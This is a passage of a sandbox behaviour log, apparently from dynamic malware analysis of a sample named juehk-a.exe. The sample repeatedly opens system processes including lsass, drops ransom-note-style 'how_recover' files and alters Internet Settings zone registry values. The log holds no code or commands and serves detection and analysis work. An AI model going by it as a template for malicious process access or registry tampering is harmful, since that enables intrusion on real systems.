- mode: opened
- sequenceNumber: 259
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 264
- imagepath: C:\Windows\System32\smss.exe
- md5sum: 1911a3356fa3f77ccc825ccbac038c2a
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 42313
- mode: opened
- sequenceNumber: 260
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 348
- imagepath: C:\Windows\System32\csrss.exe
- md5sum: 60c2862b4bf0fd9f582ef344c2b1ec72
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 42317
- mode: opened
- sequenceNumber: 261
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 376
- imagepath: C:\Windows\System32\wininit.exe
- md5sum: 94355c28c1970635a31b3fe52eb7ceba
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 42322
- mode: opened
- sequenceNumber: 262
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 396
- imagepath: C:\Windows\System32\csrss.exe
- md5sum: 60c2862b4bf0fd9f582ef344c2b1ec72
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 42326
- mode: opened
- sequenceNumber: 263
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 432
- imagepath: C:\Windows\System32\winlogon.exe
- md5sum: 1151b1baa6f350b1db6598e0fea7c457
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 42331
- mode: opened
- sequenceNumber: 264
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 476
- imagepath: C:\Windows\System32\services.exe
- md5sum: 24acb7e5be595468e3b9aa488b9b4fcb
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 42335
- mode: opened
- sequenceNumber: 265
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 492
- imagepath: C:\Windows\System32\lsass.exe
- md5sum: 0793f40b9b8a1bdd266296409dbd91ea
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 42369
- mode: opened
- sequenceNumber: 266
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 500
- imagepath: C:\Windows\System32\lsm.exe
- md5sum: 9662ee182644511439f1c53745dc1c88
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 42374
- mode: opened
- sequenceNumber: 267
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 612
- imagepath: C:\Windows\System32\svchost.exe
- md5sum: c78655bc80301d76ed4fef1c1ea40a7d
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 42379
- mode: opened
- sequenceNumber: 268
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 684
- imagepath: C:\Windows\System32\svchost.exe
- md5sum: c78655bc80301d76ed4fef1c1ea40a7d
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 42384
- mode: opened
- sequenceNumber: 269
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 756
- imagepath: C:\Windows\System32\svchost.exe
- md5sum: c78655bc80301d76ed4fef1c1ea40a7d
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 42388
- mode: opened
- sequenceNumber: 270
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 828
- imagepath: C:\Windows\System32\svchost.exe
- md5sum: c78655bc80301d76ed4fef1c1ea40a7d
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 42393
- mode: opened
- sequenceNumber: 271
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 868
- imagepath: C:\Windows\System32\svchost.exe
- md5sum: c78655bc80301d76ed4fef1c1ea40a7d
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 42398
- mode: opened
- sequenceNumber: 272
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 904
- imagepath: C:\Windows\System32\svchost.exe
- md5sum: c78655bc80301d76ed4fef1c1ea40a7d
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 42402
- mode: opened
- sequenceNumber: 273
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 968
- imagepath: C:\Windows\System32\spoolsv.exe
- md5sum: b96c17b5dc1424d56eea3a99e97428cd
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 42408
- mode: opened
- sequenceNumber: 274
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 1064
- imagepath: C:\Windows\System32\svchost.exe
- md5sum: c78655bc80301d76ed4fef1c1ea40a7d
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 42413
- mode: opened
- sequenceNumber: 275
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 1164
- imagepath: C:\Windows\System32\taskhost.exe
- md5sum: 639774c9acd063f028f6084abf5593ad
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 42419
- mode: opened
- sequenceNumber: 276
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 1244
- imagepath: C:\Windows\System32\dwm.exe
- md5sum: f162d5f5e845b9dc352dd1bad8cef1bc
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 42423
- mode: opened
- sequenceNumber: 277
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 1340
- imagepath: C:\Windows\System32\svchost.exe
- md5sum: c78655bc80301d76ed4fef1c1ea40a7d
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 42428
- mode: opened
- sequenceNumber: 278
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 1092
- imagepath: C:\Windows\explorer.exe
- md5sum: ac4c51eb24aa95b77f705ab159189e24
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 42432
- mode: opened
- sequenceNumber: 279
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 940
- imagepath: C:\Windows\System32\wbem\WmiPrvSE.exe
- md5sum: 619a67c9f617b7e69315bb28ecd5e1df
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 42436
- mode: opened
- sequenceNumber: 280
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 1976
- imagepath: C:\Program Files\Internet Explorer\iexplore.exe
- md5sum: 0685765c0cbe095ba0c6c8790bae21ef
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 42442
- mode: opened
- sequenceNumber: 281
- desiredaccess: 0x02000030
- ntstatus: 0xc0000022
- target:
- processinfo:
- pid: 384
- tid: 0
- imagepath: N/A
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 42446
- mode: opened
- sequenceNumber: 282
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 1460
- imagepath: C:\Program Files (x86)\Internet Explorer\iexplore.exe
- md5sum: c8a8321292a459b0a17fb39a782a5c74
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 42454
- mode: opened
- sequenceNumber: 283
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 1312
- imagepath: C:\Program Files (x86)\Internet Explorer\iexplore.exe
- md5sum: c8a8321292a459b0a17fb39a782a5c74
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 42467
- mode: opened
- sequenceNumber: 284
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 1324
- imagepath: C:\Program Files (x86)\Internet Explorer9\iexplore.exe
- md5sum: 904e13ba41af2e353a32cf351ca53639
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 42472
- mode: opened
- sequenceNumber: 285
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 1852
- imagepath: C:\Program Files (x86)\Internet Explorer9\iexplore.exe
- md5sum: 904e13ba41af2e353a32cf351ca53639
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 42477
- mode: opened
- sequenceNumber: 286
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 2152
- imagepath: C:\Windows\System32\wbem\WmiPrvSE.exe
- md5sum: 619a67c9f617b7e69315bb28ecd5e1df
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 42521
- mode: opened
- sequenceNumber: 287
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 2320
- imagepath: C:\Windows\System32\taskhost.exe
- md5sum: 639774c9acd063f028f6084abf5593ad
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- file:
- timestamp: 42526
- mode: close
- sequenceNumber: 288
- value: C:\$Recycle.Bin\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 844424930231641
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 42530
- mode: created
- sequenceNumber: 289
- value: C:\$Recycle.Bin\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953520986
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 42545
- mode: close
- sequenceNumber: 290
- value: C:\$Recycle.Bin\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953520986
- ntstatus: 0x0
- CreateOptions: 0x0
- apicall:
- timestamp: 42205
- sequenceNumber: 291
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: GetSystemDirectoryW
- address: 0x77179cce
- params:
- param (id:1): 0x2fff6cc
- param (id:2): 260
- apicall:
- timestamp: 42245
- sequenceNumber: 292
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: GetSystemDirectoryW
- address: 0x743b56d4
- params:
- param (id:1): 0x294ec30
- param (id:2): 260
- apicall:
- timestamp: 42274
- sequenceNumber: 293
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: GetSystemDirectoryW
- address: 0x743b56d4
- params:
- param (id:1): 0x294ebf8
- param (id:2): 260
- file:
- timestamp: 42574
- mode: failed
- sequenceNumber: 294
- value: C:\Users\Administrator\AppData\Local\Microsoft\Windows\Caches
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: created
- ntstatus: 0xc0000035
- CreateOptions: 0x200021
- file:
- timestamp: 42579
- mode: failed
- sequenceNumber: 295
- value: C:\Users\Administrator\AppData\Roaming\NTMARTA.DLL
- processinfo:
- tainted: true
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 42584
- mode: failed
- sequenceNumber: 296
- value: C:\Users\Administrator\AppData\Roaming\IPHLPAPI.DLL
- processinfo:
- tainted: true
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 42588
- mode: failed
- sequenceNumber: 297
- value: C:\Users\Administrator\AppData\Roaming\WINNSI.DLL
- processinfo:
- tainted: true
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 42593
- mode: failed
- sequenceNumber: 298
- value: C:\Users\Administrator\AppData\Roaming\API-MS-WIN-DOWNLEVEL-SHLWAPI-L2-1-0.DLL
- processinfo:
- tainted: true
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- mutex:
- timestamp: 42373
- sequenceNumber: 299
- value: \Sessions\1\BaseNamedObjects\ZonesCacheCounterMutex
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 42373
- mode: deleteval
- sequenceNumber: 300
- value: \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"ProxyBypass"
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 42373
- mode: deleteval
- sequenceNumber: 301
- value: \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"ProxyBypass"
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 42373
- mode: deleteval
- sequenceNumber: 302
- value: \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"IntranetName"
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 42373
- mode: deleteval
- sequenceNumber: 303
- value: \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"IntranetName"
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 42373
- mode: setval
- sequenceNumber: 304
- value: \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"UNCAsIntranet" = 0x00000000
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 42374
- mode: setval
- sequenceNumber: 305
- value: \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"AutoDetect" = 0x00000001
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- mutex:
- timestamp: 42374
- sequenceNumber: 306
- value: \Sessions\1\BaseNamedObjects\ZonesLockedCacheCounterMutex
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 42374
- mode: deleteval
- sequenceNumber: 307
- value: \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"ProxyBypass"
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 42374
- mode: deleteval
- sequenceNumber: 308
- value: \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"ProxyBypass"
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 42378
- mode: deleteval
- sequenceNumber: 309
- value: \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"IntranetName"
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 42378
- mode: deleteval
- sequenceNumber: 310
- value: \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"IntranetName"
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 42378
- mode: setval
- sequenceNumber: 311
- value: \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"UNCAsIntranet" = 0x00000000
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 42378
- mode: setval
- sequenceNumber: 312
- value: \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"AutoDetect" = 0x00000001
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 42771
- mode: opened
- sequenceNumber: 313
- desiredaccess: 0x02000030
- ntstatus: 0xc0000022
- target:
- processinfo:
- pid: 4
- tid: 0
- imagepath: N/A
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 42775
- mode: opened
- sequenceNumber: 314
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 264
- imagepath: C:\Windows\System32\smss.exe
- md5sum: 1911a3356fa3f77ccc825ccbac038c2a
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 42779
- mode: opened
- sequenceNumber: 315
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 348
- imagepath: C:\Windows\System32\csrss.exe
- md5sum: 60c2862b4bf0fd9f582ef344c2b1ec72
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 42784
- mode: opened
- sequenceNumber: 316
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 376
- imagepath: C:\Windows\System32\wininit.exe
- md5sum: 94355c28c1970635a31b3fe52eb7ceba
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 42790
- mode: opened
- sequenceNumber: 317
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 396
- imagepath: C:\Windows\System32\csrss.exe
- md5sum: 60c2862b4bf0fd9f582ef344c2b1ec72
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 42795
- mode: opened
- sequenceNumber: 318
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 432
- imagepath: C:\Windows\System32\winlogon.exe
- md5sum: 1151b1baa6f350b1db6598e0fea7c457
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 42800
- mode: opened
- sequenceNumber: 319
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 476
- imagepath: C:\Windows\System32\services.exe
- md5sum: 24acb7e5be595468e3b9aa488b9b4fcb
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 42804
- mode: opened
- sequenceNumber: 320
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 492
- imagepath: C:\Windows\System32\lsass.exe
- md5sum: 0793f40b9b8a1bdd266296409dbd91ea
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 42813
- mode: opened
- sequenceNumber: 321
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 500
- imagepath: C:\Windows\System32\lsm.exe
- md5sum: 9662ee182644511439f1c53745dc1c88
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 42818
- mode: opened
- sequenceNumber: 322
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 612
- imagepath: C:\Windows\System32\svchost.exe
- md5sum: c78655bc80301d76ed4fef1c1ea40a7d
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 42822
- mode: opened
- sequenceNumber: 323
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 684
- imagepath: C:\Windows\System32\svchost.exe
- md5sum: c78655bc80301d76ed4fef1c1ea40a7d
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 42827
- mode: opened
- sequenceNumber: 324
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 756
- imagepath: C:\Windows\System32\svchost.exe
- md5sum: c78655bc80301d76ed4fef1c1ea40a7d
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 42849
- mode: opened
- sequenceNumber: 325
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 828
- imagepath: C:\Windows\System32\svchost.exe
- md5sum: c78655bc80301d76ed4fef1c1ea40a7d
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 42890
- mode: opened
- sequenceNumber: 326
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 868
- imagepath: C:\Windows\System32\svchost.exe
- md5sum: c78655bc80301d76ed4fef1c1ea40a7d
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 42926
- mode: opened
- sequenceNumber: 327
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 904
- imagepath: C:\Windows\System32\svchost.exe
- md5sum: c78655bc80301d76ed4fef1c1ea40a7d
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 42931
- mode: opened
- sequenceNumber: 328
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 968
- imagepath: C:\Windows\System32\spoolsv.exe
- md5sum: b96c17b5dc1424d56eea3a99e97428cd
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 42953
- mode: opened
- sequenceNumber: 329
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 1064
